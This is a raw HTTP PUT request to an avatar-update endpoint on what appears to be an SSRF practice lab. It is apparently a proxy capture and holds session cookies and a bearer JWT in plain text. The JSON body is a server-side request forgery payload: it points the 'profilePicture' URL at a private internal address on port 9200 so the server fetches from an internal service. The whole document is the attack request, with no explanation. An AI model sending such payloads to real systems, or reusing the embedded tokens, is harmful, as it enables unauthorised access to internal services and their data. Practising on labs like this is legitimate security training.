PUT /api-v1/api/user/update/avatar HTTP/2
Host: ssrflab.dpdns.org
Cookie: __Host-authjs.csrf-token=ed4167a6a1befde9d24cf689f885ef12e0686a4b03407560e44dacbc2043589c%7C9b1939d25368ea9125a370ceff4b1a93c542849cc5a685f0d72b78d3c736f8cc; __Secure-authjs.callback-url=https%3A%2F%2Fssrflab.dpdns.org
Content-Length: 43
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="137", "Not/A)Brand";v="24"
Auth-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjY5OTA4MmEzMWI1YTdkNjZiMmE3NDhlNyIsImlhdCI6MTc3MTA3ODc4NSwiZXhwIjoxNzczNjcwNzg1fQ.Ty9ZXX0OScvVudpw-B77kLqfvwXp3_HhbVjKGhS2eik
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: https://ssrflab.dpdns.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ssrflab.dpdns.org/settings
Priority: u=1, i

{"profilePicture":"http://10.132.0.3:9200"}